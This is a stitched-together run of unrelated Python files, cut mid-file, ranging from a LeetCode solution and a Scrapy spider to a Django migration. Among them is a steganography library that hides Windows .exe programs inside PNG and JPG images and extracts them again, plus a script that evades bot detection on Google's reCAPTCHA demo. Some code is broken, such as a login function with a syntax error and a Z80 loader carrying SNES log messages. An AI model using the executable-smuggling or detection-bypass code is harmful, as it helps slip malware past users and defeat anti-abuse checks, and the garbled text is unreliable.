- LR_RAMPUP_EPOCHS - LR_SUSTAIN_EPOCHS) + LR_MIN return lr class WarmUpExpLR(_LRScheduler): """warmup_training learning rate scheduler Args: optimizer: optimzier(e.g. SGD) """ def __init__(self, optimizer, last_epoch=-1): super().__init__(optimizer, last_epoch) def get_lr(self): return [lrfn(self.last_epoch)]# # @lc app=leetcode id=698 lang=python3 # # [698] Partition to K Equal Sum Subsets # # @lc code=start class Solution: def solvable(self, nums: tuple[int], groups: list[int], pos: int) -> bool: if pos == len(nums): return True for i in range(len(groups)): if groups[i] >= nums[pos]: groups[i] -= nums[pos] if self.solvable(nums, groups, pos + 1): return True groups[i] += nums[pos] return False def canPartitionKSubsets(self, nums: list[int], k: int) -> bool: target, rem = divmod(sum(nums), k) return not rem and self.solvable(tuple(sorted(nums, reverse=True)), [target] * k, 0) # @lc code=end 1-10 import base64 import json import logging import os import pickle import requests from cliff.command import Command def login(username=None, password=, domain="default"): """ This is used for configuring the authentication details the initial time the user logs in. We can also configure the domain to do the requests to. After the initial setup the user need not have to log in again. """ if domain == "default": url = "http://localhost:8000/api/auth/login" auth_details = { "username": username, "password": password } response = requests.post(url, auth_details) if response.status_code == requests.codes.ok: print("You're now logged-in!") else: print("Something went wrong, please check your connection.") token = response.text json_token = json.loads(token) hashed_token = base64.b64encode(json_token["token"]) __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) outputFile = '.data' file_path = os.path.join(__location__, outputFile) with open(file_path, 'wb') as fw: pickle.dump({'Token': hashed_token}, fw) class LoginCLI(Command): "Login to EvalAI" log = logging.getLogger(__name__) def get_parser(self, prog_name): parser = super(LoginCLI, self).get_parser(prog_name) parser.add_argument('-u', '--username', help='username') parser.add_argument('-p', '--password', help='password') return parser def take_action(self, parsed_args): parsed_arg_dict = vars(parsed_args) username = parsed_arg_dict['username'] password = parsed_arg_dict['password'] login(username=username, password=password) """ Program that finds a word in a text file amazingly fast thanks to the dictionary IN operator """ import string as s def open_file(filename): try: my_file = open(filename, "r") return my_file except FileNotFoundError as f: print(f) exit() def find_in_dict(string, dictionary): """ Returns True if the key is in the dictionary, False if not """ if string in dictionary: return True return False def main(): read_file = open_file("../Cap8/romeo-full.txt") word_to_search = input("word to search: ").lower() word_to_search = word_to_search.translate(word_to_search.maketrans("", "", s.punctuation)) file_dict = {} for line in read_file: line = line.translate(line.maketrans("", "", s.punctuation)).lower() for word in line.split(): file_dict[word] = file_dict.get(word, 0) + 1 print(*[f"The word '{word_to_search}' is in the file" if find_in_dict( word_to_search, file_dict) else f"{word_to_search} is not in the file"]) print(file_dict) if __name__ == "__main__": main()Kaju-Bubanja/PoseCNNgenerate_dataset/visualize_opencv.py from common import ros_to_blender_quat, get_filename_prefix import cv2 from cv_bridge import CvBridge from export_data_from_ros_bag import fill_transformer, get_datasets, Dataset import numpy as np from pyquaternion import Quaternion import rosbag import rospy import tf import os def get_corner(tf_t, times, num_boxes): corner = [] for i in range(num_boxes): (trans, rot) = tf_t.lookupTransform("vicon", "box" + str(i + 1), rospy.Time(int(times[i][0]), int(times[i][1]))) corner.append(list(trans)) corners = np.float32(corner) return corners def calculate_point(name, K, R, t, corner): print(name + "\n\n") print("K: " + str(K)) R = np.hstack((R, t)) print("R: " + str(R)) print("T: " + str(t)) print("Corner: " + str(corner)) result = np.dot(np.dot(K, R), corner) print("By hand: " + str(result)) def calculate_point_camera(name, K, corner): print(name + "\n\n") print("K: " + str(K)) print("Corner: " + str(corner)) result = np.dot(K, corner) print("By hand camera frame: " + str(result)) def main(): datasets = get_datasets() # dataset, boxes, num_boxes, times, start_time, end_time = read_config() for dataset in datasets: times = dataset.times num_boxes = dataset.num_boxes start_time = dataset.start_time end_time = dataset.end_time bag = rosbag.Bag(os.path.join(Dataset.bags_path, dataset.name + ".bag")) topics = ["/camera/color/image_raw"] tf_t = fill_transformer(bag) corner_input = get_corner(tf_t, times, num_boxes) # print(corner_input) camera_matrix = np.float32([[610.55992534, 0, 306.86169342], [0, 610.32086262, 240.94547232], [0, 0, 1]]) dist = np.float32([[0.10793695], [-0.21546604], [0.00045875], [-0.00670819]]) # dist = np.float32([[0], [0], [0], [0]]) bridge = CvBridge() font = cv2.FONT_HERSHEY_SIMPLEX fontScale = 0.5 fontColor = (255, 255, 255) lineType = 2 print(start_time) print(end_time) counter = 1 for topic, msg, t in bag.read_messages(topics=topics, start_time=start_time, end_time=end_time): # print(msg.header.stamp) if topic == "/camera/color/image_raw": try: (trans, rot) = tf_t.lookupTransform("camera", "vicon", msg.header.stamp) except tf.ExtrapolationException: pass trans = np.float32([[trans[0]], [trans[1]], [trans[2]]]) camera_quat = Quaternion(ros_to_blender_quat(rot)) camera_rodrigues, jacobian = cv2.Rodrigues(camera_quat.rotation_matrix) image = bridge.imgmsg_to_cv2(msg, "bgr8") corners, jacobian = cv2.projectPoints(corner_input, camera_rodrigues, trans, camera_matrix, dist) corner_counter = 1 for corner in corners: corner = tuple(corner[0]) if corner[0] > 0 and corner[1] > 0: cv2.circle(image, corner, 3, (255, 0, 0), -1) cv2.putText(image, str(corner_counter), corner, font, fontScale, fontColor, lineType) corner_counter += 1 prefix = get_filename_prefix(counter) mask_name = os.path.join(Dataset.data_output_path, dataset.name, prefix + "-label.png") mask = cv2.imread(mask_name) alpha = 0.5 image_with_mask = cv2.addWeighted(mask, alpha, image, 1 - alpha, 0) w = 1280 h = 960 image_with_mask = cv2.resize(image_with_mask, (w, h)) cv2.resizeWindow("Image", w, h) cv2.imshow("Image", image_with_mask) cv2.waitKey(100) counter += 1 if __name__ == "__main__": main() from tg import expose from helloworld.lib.base import BaseController class RootController(BaseController): @expose() def welcome(self): return "Hello World!" from .errors import * end_hex = b"\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82" class PNG: """ Function for PNG. - ----- Parameter : - image_path: `str` | Set PNG file to modify ----- Methods : - hide_message - hide_program - reveal_message - reveal_program """ def __init__(self, image_path:str): if image_path == None: raise CannotNone("image_path") self.image_path = image_path def hide_message(self, message:str): """ Method to hide message in PNG file. ----- Parameter : - message: `str` | Messages that want to hide """ if message == None: raise CannotNone("message") encoded_msg = str.encode(message) with open(self.image_path, 'ab') as f: f.write(encoded_msg) print("Success!") def hide_program(self, program_path:str): """ Method to hide program (`.exe`) in PNG file. ----- Parameter : - program_path: `str` | Program that want to hide """ if program_path == None: raise CannotNone("program_path") if ".exe" in program_path: pass else: program_path = program_path + ".exe" with open(self.image_path, 'ab') as f, open(program_path, 'rb') as p: f.write(p.read()) print("Success!") def reveal_message(self, encoding:str="UTF-8"): """ Method to reveal secret message in PNG file. ----- Parameter : - encoding: `str` | Default: `UTF-8` """ with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(end_hex) f.seek(offset + len(end_hex)) return f.read().decode(encoding) def reveal_program(self, new_name:str): """ Method to reveal secret program and create new file (`.exe`) from inside PNG file. - Parameter : - new_name: `str` | Set name for files from PNG """ if new_name == None: raise CannotNone("new_name") if ".exe" in new_name: pass else: new_name = new_name + ".exe" with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(end_hex) f.seek(offset + len(end_hex)) new_name = str(new_name) with open(new_name, 'wb') as p: p.write(f.read()) print("Success!") class JPG: """ Function for JPG/JPEG. - ----- Parameter : - image_path: `str` | Set PNG file to modify ----- Methods : - hide_message - hide_program - reveal_message - reveal_program """ def __init__(self, image_path:str): if image_path == None: raise CannotNone("image_path") self.image_path = image_path def hide_message(self, message:str): """ Method to hide message in JPG/JPEG file. ----- Parameter : - message: `str` | Messages that want to hide """ if message == None: raise CannotNone("message") encoded_msg = str.encode(message) with open(self.image_path, 'ab') as f: f.write(encoded_msg) print("Success!") def hide_program(self, program_path:str): """ Method to hide program (`.exe`) in JPG/JPEG file. ----- Parameter : - program_path: `str` | Program that want to hide """ if program_path == None: raise CannotNone("program_path") if ".exe" in program_path: pass else: program_path = program_path + ".exe" with open(self.image_path, 'ab') as f, open(program_path, 'rb') as p: f.write(p.read()) print("Success!") def reveal_message(self, encoding:str="UTF-8"): """ Method to reveal secret message in JPG/JPEG file. ----- Parameter : - encoding: `str` | Default: `UTF-8` """ with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(bytes.fromhex('FFD9')) f.seek(offset + 2) return f.read().decode(encoding) def reveal_program(self, new_name:str): """ Method to reveal secret program and create new file (`.exe`) from inside JPG/JPEG file. - Parameter : - new_name: `str` | Set name for files from JPG/JPEG """ if new_name == None: raise CannotNone("new_name") if ".exe" in new_name: pass else: new_name = new_name + ".exe" with open(self.image_path, 'rb') as f: content = f.read() offset = content.index(bytes.fromhex('FFD9')) f.seek(offset + 2) new_name = str(new_name) with open(new_name, 'wb') as p: p.write(f.read()) print("Success!") ''' Return the number of even ints in the given array. Note: the % "mod" operator computes the remainder, e.g. 5 % 2 is 1. ''' def count_evens(nums): count = 0 for i in nums: if i % 2 == 0: count += 1 return count # Copyright 2011-2012 Yelp # Copyright 2016 Yelp # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import platform import sys import doloop try: from setuptools import setup # arguments that distutils doesn't understand setuptools_kwargs = { 'provides': ['doloop'], 'test_suite': 'tests.suite.load_tests', 'tests_require': ['PyMySQL'], } # unittest2 is a backport of unittest from Python 2.7 if sys.version_info < (2, 7): setuptools_kwargs['tests_require'].append('unittest2') # only add MySQLdb for Python 2 if sys.version_info < (3, 0): setuptools_kwargs['tests_require'].append('MySQL-python') # mysql-connector doesn't work on Python 3.2 (this happens for pypy3) if sys.version_info < (3, 0) or sys.version_info >= (3, 3): setuptools_kwargs['tests_require'].append('mysql-connector') # oursql seems not to work right with PyPy if platform.python_implementation() == 'CPython': if sys.version_info < (3, 0): setuptools_kwargs['tests_require'].append('oursql') else: setuptools_kwargs['tests_require'].append('oursql3') except ImportError: from distutils.core import setup setuptools_kwargs = {} setup( author='', author_email='', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Topic :: Database', ], description='Task loop for keeping things updated', entry_points=dict( console_scripts=[ 'create-doloop-table=doloop:_main_for_create_doloop_table' ], ), license='Apache', long_description=open('README.rst').read(), name='doloop', py_modules=['doloop'], url='http://github.com/Yelp/doloop', version=doloop.__version__, **setuptools_kwargs ) #!/usr/bin/env python # -*- coding: utf-8 -*- # # Author: # Author: # Email: # Description: Examine multiples VSs and generates a resume of the results. # ______________________________________________________________________________________________________________________ import argparse import glob import json import os from os.path import dirname, join import os.path from collections import OrderedDict from subprocess import Popen, PIPE, STDOUT import datetime from shutil import copyfile import tarfile import time FORMAT_OUT = 'lst_{}{}.txt' PYTHON_RUN = "python " JOIN_CL_SESSIONS = "MetaScreener/extra_metascreener/results/join/join_cl_json_vs_session.py" F_JOIN_SESSIONS = PYTHON_RUN + ' ' + JOIN_CL_SESSIONS + ' -f {} -d {} -r {} -o {} -v' parser = argparse.ArgumentParser() parser.add_argument('folder', type=str, nargs='+', help='Execution folders (2 at least) ') parser.add_argument('-r', '--receptor', default='', type=str) parser.add_argument('-o', '--output', default='', type=str, help='name of output file') args = parser.parse_args() if len(args.folder) == 1: parser.print_help() exit() def read_energies(dir): dct = {} with open(dir + "/Results_scoring.csv") as csv: line = csv.readline() # header line = csv.readline() cnt = 1 while line: line.strip() key = line.split(';')[4] data = float(line.split(';')[0]) data2 = str(line.split(';')[-1]) dct[key] = [data, data2.replace("\n", " ")] line = csv.readline() cnt += 1 return dct def make_tarfile(source_dir, output_filename): with tarfile.open(output_filename, "w:gz") as tar: tar.add(source_dir, arcname=os.path.basename(source_dir)) def execute_cmd(cmd): p = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True) for line in iter(p.stdout.readline, b''): print(line.strip()) p.stdout.close() p.wait() directories = '' all = OrderedDict() first_sw = "" name_out = '' ORDER = False start = time.time() for dir in args.folder: index = dir.find('VS_') directories += '{} '.format(dir) sw = dir[index + 3:index + 5] if (sw not in name_out): name_out += '{}_'.format(sw) if (sw == "LS"): print("Software LS is not supported") exit() energies = read_energies(dir) if len(energies) > 0: ORDER = True if sw in all.keys(): all[sw].update(energies) else: all[sw] = energies if first_sw == "": first_sw = sw if ORDER: for sw in all.keys(): all[sw] = OrderedDict(sorted(all[sw].items(), key=lambda x: x[1])) print("Time for read and sort all single energy files: %s seconds " % (time.time() - start)) name_out = name_out[:-1] if args.output == '': prefix_out = os.path.basename(args.folder[0]) prefix_out = prefix_out[prefix_out.find(first_sw) + len(first_sw):] file_out = FORMAT_OUT.format(name_out, prefix_out) else: file_out = args.output header = " Rank ".join(all.keys()) + " Rank Molecule" header = ", ".join(all.keys()) print(file_out) f_out = open(file_out, 'w') print(header) f_out.write('{}\n'.format(header)) rank = 1; print("Total number of softwares: " + str(len(all))) start = time.time() if len(all) == 0: print("No results have been found") exit() for molecule in all[first_sw]: score = all[first_sw][molecule][0] path = all[first_sw][molecule][1] aux = "" for sw in all.keys(): if sw != first_sw: if all[sw].has_key(molecule): result = all[sw][molecule] aux += '{} {} {}'.format(all[sw].keys().index(molecule)+1, result[0], result[1] ) else: aux += "-- -- --" print(' {} {} {} {} {}'.format(rank, score, path, aux, molecule)) f_out.write(' {} {} {} {} {}\n'.format(rank, score, path, aux, molecule)) rank += 1 f_out.close() print("Time for cross all softwares results: %s seconds " % (time.time() - start)) if (args.receptor): if (os.path.isfile(args.receptor)): out_join = file_out[:file_out.rindex("_")] cmd = F_JOIN_SESSIONS.format(file_out, directories, args.receptor, out_join) f_cl = output = '{}_{}'.format(out_join, datetime.date.today()) print(cmd) execute_cmd(cmd) copyfile(file_out, join(f_cl, file_out)) make_tarfile(f_cl, '{}.tar.gz'.format(f_cl)) else: print("Error receptor does not exists") tests/unit/contrib/consul/conftest.py0 import pytest from sitri.contrib.consul import ConsulConfigProvider from .mock import ConsulMock @pytest.fixture(scope="module") def consul_connection() -> ConsulMock: return ConsulMock() @pytest.fixture(scope="module") def consul_config(consul_connection) -> ConsulConfigProvider: return ConsulConfigProvider(consul_connection=consul_connection, folder="test/") disco/disco_update_icecast2.py # disco_update_icecast2 # # Should be configured to run after the Disco server starts up. import urllib.parse import urllib.request import subprocess import time username = "" password = "" hostname = "" port = "" mountpoint = "/disco" playlist_command = "disco --playlist" while True: playlist = subprocess.check_output(playlist_command, shell=True, bufsize=1).decode("utf-8").split('\n') current = playlist[0].split(',') artist = urllib.parse.quote(current[1].replace('"', '')) song = urllib.parse.quote(current[2].replace('"', '')) url = "http://{:s}:{:s}/admin/metadata?mount={:s}&mode=updinfo&song={:s}+-+{:s}".format(hostname, port, mountpoint, artist, song) # From https://docs.python.org/3.1/howto/urllib2.html password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() top_level_url = url password_mgr.add_password(None, top_level_url, username, password) handler = urllib.request.HTTPBasicAuthHandler(password_mgr) opener = urllib.request.build_opener(handler) opener.open(url) urllib.request.install_opener(opener) time.sleep(5) import asyncio from pyppeteer import launch import fuckcaptcha as fucking import sys async def main(): browser = await launch(headless=False) page = await browser.newPage() await fucking.bypass_detections(page) await page.goto("https://www.google.com/recaptcha/api2/demo") while True: await asyncio.sleep(1) if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() # workaround for KeyboardInterrupt on wangblows async def wake_the_fuck_up(): while True: await asyncio.sleep(1) loop.create_task(wake_the_fuck_up()) loop.run_until_complete(main()) gillbam/pcnio_util.py ''' MIT License Copyright (c) 2018 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' import numpy as np import open3d as o3d def read_pcd(filename): pcd = o3d.io.read_point_cloud(filename) return np.array(pcd.points) def save_pcd(filename, points): pcd = o3d.geometry.PointCloud() pcd.points = o3d.utility.Vector3dVector(points) o3d.io.write_point_cloud(filename, pcd) import create2api import json # We'll use this to format the output bot = create2api.Create2() bot.start() bot.safe() print '==============Start Up Data==============' print json.dumps(bot.sensor_state, indent=4) print '=========================================' print '' #Packet 100 contains all sensor data. bot.get_packet(100) print '==============Updated Sensors==============' print json.dumps(bot.sensor_state, indent=4, sort_keys=False) witms/spiders/wp.py0 from scrapy import Spider from scrapy.linkextractors import LinkExtractor from witms.items import Article from witms.loaders import ArticleLoader class WashingtonPostSpider(Spider): name = "wp" portal_name = "Washington Post" allowed_domains = ["washingtonpost.com"] start_urls = ["https://www.washingtonpost.com/"] link_extractor = LinkExtractor( deny=[ "/people/", "commerce.washingtonpost.com", "realestate.washingtonpost.com", "stats.washingtonpost.com", ] ) def parse(self, response): loader = ArticleLoader(item=Article(), response=response) loader.add_value("url", response.url) loader.add_value("portal", WashingtonPostSpider.portal_name) loader.add_xpath("section", '//meta[@property="article:section"]/@content') loader.add_xpath("section", '//meta[@itemprop="articleSection"]/@content') loader.add_css("authors", "a[class*=author-name] *::text") loader.add_css("title", "h1 *::text") loader.add_xpath("title", '//meta[@name="title"]/@content') loader.add_xpath("title", '//meta[@property="og:title"]/@content') loader.add_xpath("description", '//meta[@name="description"]/@content') loader.add_xpath("description", '//meta[@property="og:description"]/@content') loader.add_css("content", "div[class=article-body] *::text") loader.add_xpath("content", "//article//p//text()") loader.add_xpath("content", "//p//text()") loader.add_xpath( "publish_timestamp", '//meta[@property="article:published_time"]/@content' ) loader.add_xpath( "publish_timestamp", '//time[@itemprop="datePublished"]/@datetime' ) loader.add_xpath( "publish_timestamp", "//script//text()", re=r'"datePublished":\s*"(.*?)"' ) loader.add_xpath( "update_timestamp", '//meta[@property="article:modified_time"]/@content' ) loader.add_xpath( "update_timestamp", '//time[@itemprop="dateModified"]/@datetime' ) loader.add_xpath( "update_timestamp", "//script//text()", re=r'"dateModified":\s*"(.*?)"' ) yield loader.load_item() for link in self.link_extractor.extract_links(response): yield response.follow(link.url, callback=self.parse) """ Peasauce - interactive disassembler Copyright (C) 2012-2017 Licensed using the MIT license. """ import pickle import os import struct import sys import logging from .. import constants logger = logging.getLogger("loader-zxspectrum-z80") OFFSET_V1_PROGRAM_COUNTER = 6 OFFSET_V23_HEADER_LENGTH = 30 LENGTH_V1_HEADER = 30 LENGTH_V2_HEADER = 23 LENGTH_V3_HEADER_A = 54 LENGTH_V3_HEADER_B = 55 class File(object): EXPECTED_SUFFIX = "z80" header_page_count_8kb: int = 0 def identify_input_file(input_file, file_info, data_types, f_offset=0, f_length=None): result = constants.MatchResult() if file_info.has_file_name_suffix(File.EXPECTED_SUFFIX): result.confidence = constants.MATCH_POSSIBLE # Check expected values input_file.seek(f_offset + OFFSET_V1_PROGRAM_COUNTER) header1_pc = data_types.uint16(input_file.read(2)) if header1_pc == 0: input_file.seek(f_offset + OFFSET_V23_HEADER_LENGTH) header2_length = data_types.uint16(input_file.read(2)) if header2_length == LENGTH_V2_HEADER: result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_2 elif header2_length in (LENGTH_V3_HEADER_A, LENGTH_V3_HEADER_B): result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_3 if result.file_format_id != constants.FileFormat.UNKNOWN: result.confidence = constants.MATCH_PROBABLE else: result.file_format_id = constants.FileFormat.ZXSPECTRUM_Z80_1 if result.file_format_id != constants.FileFormat.UNKNOWN: result.platform_id = constants.PLATFORM_ZXSPECTRUM return result def load_input_file(input_file, file_info, data_types, f_offset=0, f_length=None): return load_z80_file(file_info, data_types, input_file, f_offset, f_length) def load_z80_file(file_info, data_types, f, f_offset=0, f_length=None): f.seek(f_offset, os.SEEK_SET) # Offset Bytes ... data = File() # 0 2 8kb page count data.header_page_count_8kb = data_types.uint16(f.read(2)) # 2 1 emulation mode? f.read(1) # 3 5 reserved f.read(5) # 8 1 0xAA id_byte1 = data_types.uint8(f.read(1)) if id_byte1 != 0xAA: logger.debug("snes/romfile.py: load_smc_file: expected 0xAA at offset 8, got %02X." % id_byte1) return False # 9 1 0xBB id_byte2 = data_types.uint8(f.read(1)) if id_byte2 != 0xBB: logger.debug("snes/romfile.py: load_smc_file: expected 0xBB at offset 9, got %02X." % id_byte2) return False # 10 1 game type? game_type = data_types.uint8(f.read(1)) if game_type != 4: logger.debug("snes/romfile.py: load_smc_file: unknown game type %d." % game_type) return False rom_offset = f_offset + 512 f.seek(f_offset + 512, os.SEEK_SET) lohi_page_sizes = [ 0x8000, 0x10000 ] def read_rom_header(page_size): """ There are several types of ROM: LoROM $20 HiROM $21 LoROM / FastROM $30 HiROM / FastROM $31 ExLoROM $32 ExHiROM $35 The checksum and checksum complement once or'd together, should produce 0xFFFF. """ f.seek(rom_offset + page_size - 64, os.SEEK_SET) game_title = f.read(21) # xxC0-xxD4 lohifastex_byte = data_types.uint8(f.read(1)) # xxD5 rom_type = data_types.uint8(f.read(1)) # xxD6 rom_size = data_types.uint8(f.read(1)) # xxD7 sram_size = data_types.uint8(f.read(1)) # xxD8 license_id_code = data_types.uint16(f.read(2)) # xxD9-xxDA version_number = data_types.uint8(f.read(1)) # xxDB checksum_complement = data_types.uint16(f.read(2)) # xxDC-xxDD checksum = data_types.uint16(f.read(2)) # xxDE-xxDF if checksum | checksum_complement != 0xFFFF: logger.debug("snes/romfile.py: load_smc_file: skipping page ending %06X, checksum mismatch." % page_size) return False idx_HiROM = lohifastex_byte & 0x01 if page_size != lohi_page_sizes[idx_HiROM]: logger.debug("snes/romfile.py: load_smc_file: skipping page ending %06X, size mismatch." % page_size) return False f.read(4) # xxE0-xxE3 native_mode_vector_COP = data_types.uint16(f.read(2)) # xxE4-xxE5 native_mode_vector_BRK = data_types.uint16(f.read(2)) # xxE6-xxE7 native_mode_vector_ABORT = data_types.uint16(f.read(2)) # xxE8-xxE9 native_mode_vector_NMI = data_types.uint16(f.read(2)) # xxEA-xxEB native_mode_vector_RESET = data_types.uint16(f.read(2)) # xxEC-xxED native_mode_vector_IRQ = data_types.uint16(f.read(2)) # xxEE-xxEF f.read(4) # xxF0-xxF3 emulation_mode_vector_COP = data_types.uint16(f.read(2)) # xxF4-xxF5 emulation_mode_vector_ABORT = data_types.uint16(f.read(2)) # xxF6-xxF7 emulation_mode_vector_NMI = data_types.uint16(f.read(2)) # xxF8-xxF9 emulation_mode_vector_RESET = data_types.uint16(f.read(2)) # xxFA-xxFB emulation_mode_vector_BRK = data_types.uint16(f.read(2)) # xxFC-xxFD emulation_mode_vector_IRQ = data_types.uint16(f.read(2)) # xxFE-xxFF return True for page_size in lohi_page_sizes: if read_rom_header(page_size): break else: logger.debug("snes/romfile.py: load_smc_file: failed to locate valid header.") return False return True SAVEFILE_VERSION = 1 def save_project_data(f, data): f.write(struct.pack("AtzeDeVries/jobernetes """ Class creates a job model from a directory structure. """ import logging import os.path import yaml import json class JobModel: def __init__(self,path='jobermodel.yaml', source_type='file'): """ Initialized Jobmodel (path=jobmodel,source_type='file') """ self.log = logging.getLogger(__name__) self.log.debug('Initialized JobModel') self.path = path source_type = 'file' #shameless override (git/url should beimplemented) #if not type directory validate path if source_type == 'file': self.log.debug('Checking if path: "%s" exsists' % path) if not os.path.exists(path): self.log.error('Path does not exist or is not readable: "%s"' % path) exit(1) #validate source type options source_type_options = ['file','git','url'] if not source_type in source_type_options: self.log.error('ERROR: sourcetype should be one of %s' % source_type_options) exit(1) def get_jobmodel(self): """ Returns a phases Object """ with open(self.path, 'rt') as f: self.log.debug('Opening jobermodel "%s"' % self.path) phases = yaml.safe_load(f.read())['jobernetes'] self.__validate_jobmodel(phases) for phase in phases: self.__explode_directory(phase) self.__extend_jobmodel(phases) self.log.info('Imported jobermodel from "%s"' % self.path) return phases def __extend_jobmodel(self,phases): count = 0 for phase in phases: for job in phase['jobs']: job['kube_job_definition'] = self.__get_kube_job_definition(job['job_path']) job['kube_job_definition']['metadata']['labels']['jobernetes_job_name'] = job['name'] job['kube_job_definition']['metadata']['labels']['jobernetes_phase'] = str(count) job['kube_job_definition']['metadata']['labels']['jobernetes_exploded'] = str('type' in job and job['type']=='exploded') count += 1 def __explode_directory(self,phase): new_job_array = [] for job in phase['jobs']: if self.__is_job_type_directory(job): count = 0 for f in self.__directory_filelist(job): appender = {'name': job['name'], 'job_path': f, 'type': 'exploded'} if 'depends_on' in job: appender['depends_on'] = job['depends_on'] count += 0 new_job_array.append(appender) else: new_job_array.append(job) phase['jobs'] = new_job_array return phase def __validate_jobmodel(self,phases,dry_run=False): """ Validates the Jobmodel * checks if job path exist * checks if job path is correct * checks if dependencies exists * checks if phase/job names are unique (to be implemented) * checks names on spaces (not allowed) * check if a phase has at least one job without dependency * Should check for circle dependencies """ ok=True names_list = [] for phase in phases: self.log.debug('Checking phase: "%s"' % phase['phase_name']) non_dependend_jobs = False names_list.append(phase['phase_name']) if not self.__is_name_ok(phase['phase_name']): ok = False for job in phase['jobs']: #validate paths names_list.append(job['name']) if not self.__is_name_ok(job['name']): ok=False self.log.debug('Check if path "%s" exists' % job['job_path']) if not os.path.exists(job['job_path']): ok=False self.log.warn('Path does not exist or is not readable: "%s"' % job['job_path']) else: self.log.debug('Check if path "%s" is dir or file' % job['job_path'] ) if 'type' in job and job['type'] == 'directory': if os.path.isfile(job['job_path']): ok=False self.log.warn('Job is a directory but path is a ' 'file "%s"'% job['job_path']) else: if os.path.isdir(job['job_path']): ok=False self.log.warn('Job is a file but path is a ' 'directory "%s"'% job['job_path']) #validate dependencies if 'depends_on' in job: for dep in job['depends_on']: self.log.debug('Check if dependencies "%s" from job ' '"%s" exists' % (dep,job['name'])) if not self.__validate_dependency(phase,dep): ok=False self.log.warn('Dependency "%s" of job "%s" does ' 'not exist' % (dep,job['name'])) if not 'depends_on' in job or len(job['depends_on']) == 0: non_dependend_jobs = True if not non_dependend_jobs: ok = False if not len(names_list) == len(set(names_list)): ok = False if not dry_run and not ok: self.log.error('Validation of jobermodel failed, exiting.') exit(1) def __is_name_ok(self,name): """ check if name contains spaces. Should be extened to a more intellegent solution """ return len(name.split()) == 1 def __validate_dependency(self,current_phase,dependency): """ Validates a depenency, returns True/False Requires 'current_phase' and 'depenceny' """ for job in current_phase['jobs']: if job['name'] == dependency: return True return False def __is_job_type_directory(self,job): return 'type' in job and job['type'] == 'directory' def __directory_filelist(self,job): """ Only use if jobtype is directory. :param: job (dict type: directory) :returns: array of files in job directory """ filelist = [] for _, _, files in os.walk(job['job_path']): for job_file in files: self.log.debug('Checking file %s' % job_file) if job_file.split('.')[-1] in ['yml','yaml','json']: filelist.append(os.path.join(job['job_path'],job_file)) return filelist def __get_kube_job_definition(self,job_path): """ TODO: validate is yaml/json is a job """ if job_path.split('.')[-1] in ['yml','yaml']: with open(job_path) as f: self.log.debug('Opening kubejob "%s"' % job_path) return yaml.safe_load(f.read()) elif job_path.split('.')[-1] in ['json']: with open(job_path) as f: self.log.debug('Opening kubejob "%s"' % job_path) return json.safe_load(f.read()) else: self.log.error('Fail, jobpath: "%s" should be yml,yaml or json') exit(1) interventi/migrations/0001_initial.py # Generated by Django 2.2.1 on 2019-05-27 10:15 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Fornitore', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nome', models.CharField(max_length=250)), ('tipo_servizio_offerto', models.CharField(max_length=200)), ('indirizzo', models.CharField(blank=True, max_length=250)), ('citta', models.CharField(blank=True, max_length=200)), ('referente', models.CharField(blank=True, max_length=200)), ('email', models.EmailField(blank=True, max_length=200)), ('telefono', models.CharField(blank=True, max_length=200)), ('annotazioni', models.TextField(blank=True)), ], options={ 'verbose_name_plural': 'Fornitori', }, ), migrations.CreateModel( name='PuntoVendita', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nome', models.CharField(max_length=250)), ('indirizzo', models.CharField(blank=True, max_length=250)), ('citta', models.CharField(blank=True, max_length=200)), ('responsabile', models.CharField(blank=True, max_length=200)), ('email', models.EmailField(blank=True, max_length=200)), ('telefono', models.CharField(blank=True, max_length=200)), ('annotazioni', models.TextField(blank=True)), ('fornitori_preferiti', models.ManyToManyField(blank=True, related_name='punti_vendita', to='interventi.Fornitore')), ('utenti_preferiti', models.ManyToManyField(blank=True, related_name='punti_vendita', to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 